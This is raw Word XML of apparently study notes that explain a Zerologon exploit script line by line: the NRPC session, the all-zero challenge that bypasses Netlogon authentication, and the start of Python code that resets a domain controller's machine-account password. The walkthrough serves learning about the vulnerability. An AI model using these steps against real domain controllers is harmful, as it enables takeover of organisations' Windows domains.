        <w:lastRenderedPageBreak/>
        <w:t>lines 1-4 – importation from Impacket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76667624" w14:textId="0527F124" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lines 6-8 – misc libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A943E" w14:textId="5B4F9F3B" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>line 9 – constant definition of max retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C8F2D" w14:textId="2A031A62" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lines 76-86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5417F2F9" w14:textId="3067DBFA" w:rsidR="00BB6CDE" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>declaration of main function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6EC895" w14:textId="7BF10599" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>checking parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6870BCC2" w14:textId="79AB56ED" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>variable passage dc_name and dc_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D32BC9B" w14:textId="4537FD7D" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lines 57-73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100484B2" w14:textId="2A27B88B" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>defining where variables are passed into local function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF7926" w14:textId="16D96622" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rpc_con variable set to keep track to check if authentication is successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FEEA9" w14:textId="2D217621" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or until 2000 tries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD8DE0" w14:textId="26A3D48A" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lines 20-25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D6C46" w14:textId="5FC87CC5" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>establishing a bind and session with NRPC over TCP/IP to communicate with domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29676F4E" w14:textId="7D4004C4" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lines 27-40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03D38F" w14:textId="0E0C53EB" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>establish variables containing cipher and plaintext 16 bytes to exploit Zero Logon vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC07CF" w14:textId="51A4B337" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view flags from Windows 10 Client with Sign and Seal bit disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C1C6C" w14:textId="05CFDC6F" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creates a NetrServerReqChallenge containing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F26D8" w14:textId="77777777" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     NTSTATUS NetrServerReqChallenge(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421FA8B" w14:textId="77777777" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       [in, unique, string] LOGONSRV_HANDLE PrimaryName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06958AAE" w14:textId="77777777" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       [in, string] wchar_t* ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5E311" w14:textId="77777777" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       [in] PNETLOGON_CREDENTIAL ClientChallenge,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12484FD1" w14:textId="59612943" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F78C7D4" w14:textId="1DC70895" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>primary name is dc handle, computer name is target computer, and client challenge is the zero payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A0F765" w14:textId="35C8B673" w:rsidR="00883FB3" w:rsidRDefault="00883FB3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try-except established to exploit Zero Logon vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C1844" w14:textId="26E512F9" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>setup receiver from server for ServerCredential and AccountRid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15A5D6" w14:textId="678660C6" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lines 44-54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B6D30" w14:textId="56C177D0" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>receives Error Code from server or variable assigned to establish an Authentication Session with target device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E3BC1" w14:textId="72F2C17E" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>success returns rpc_con variable to inform successful bypass of Authentication with Zero Logon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5F8E8" w14:textId="5828CAAD" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Interaction with NRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF432E1" w14:textId="2180BA97" w:rsidR="00FE1267" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidR="00FE1267" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E3A6B37" w14:textId="6F6016AF" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change password over NRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108BADDE" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NTSTATUS NetrServerPasswordSet2(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999DEAF" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in, unique, string] LOGONSRV_HANDLE PrimaryName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00D2E3" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in, string] wchar_t* AccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA73D35" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in] NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E40613" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in, string] wchar_t* ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9EF5B" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in] PNETLOGON_AUTHENTICATOR Authenticator,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F031A1" w14:textId="77777777" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   [in] PNL_TRUST_PASSWORD ClearNewPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54531AB4" w14:textId="56FAFAA1" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DE92C" w14:textId="647EB566" w:rsidR="00FE1267" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r w:rsidR="00FE1267" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="503EBDF4" w14:textId="51D9B9F1" w:rsidR="00FE1267" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidR="00FE1267" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="294E01DC" w14:textId="42239F03" w:rsidR="00FE1267" w:rsidRDefault="00FE1267" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Requires two values – Authenticator and ClearNewPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9819F8" w14:textId="4B0B01C0" w:rsidR="0008017D" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidR="0008017D" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="458D8976" w14:textId="57F0334C" w:rsidR="0008017D" w:rsidRDefault="0008017D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NETLOGON_CREDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECD5C2" w14:textId="01F0AC70" w:rsidR="0008017D" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidR="0008017D" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A42BDDC" w14:textId="01DF89D3" w:rsidR="0008017D" w:rsidRDefault="0008017D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>takes 8 bytes of data – 8 bytes of Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B71840" w14:textId="62A3E17F" w:rsidR="0008017D" w:rsidRDefault="0008017D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Password Change via NRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440EAC63" w14:textId="70EDEC7B" w:rsidR="0008017D" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidR="0008017D" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SecureAuthCorp/impacket/blob/master/impacket/dcerpc/v5/nrpc.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4683FB00" w14:textId="2B4AD5BF" w:rsidR="0008017D" w:rsidRDefault="0008017D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>craft netrServerPasswordSet2 Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F6BF06" w14:textId="584F8DF4" w:rsidR="0008017D" w:rsidRDefault="0008017D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>structure of Authenticator portion must be known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05A01B" w14:textId="5A834029" w:rsidR="0008017D" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>added code will go immediately before “return rpc_con” line 45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784139B6" w14:textId="57C3B366" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>will let known successful authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C64446" w14:textId="6CE88B37" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>grab before terminating RPC connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031A50F" w14:textId="31287438" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDE2017" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>newPassRequest = nrpc.NetrServerPasswordSet2()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782036D" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['PrimaryName'] = dc_handle + '\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA23D2" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['AccountName'] = target_computer + '$\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD041B" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E237153" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    auth = nrpc.NETLOGON_AUTHENTICATOR()</w:t>
      </w:r>
    </w:p>
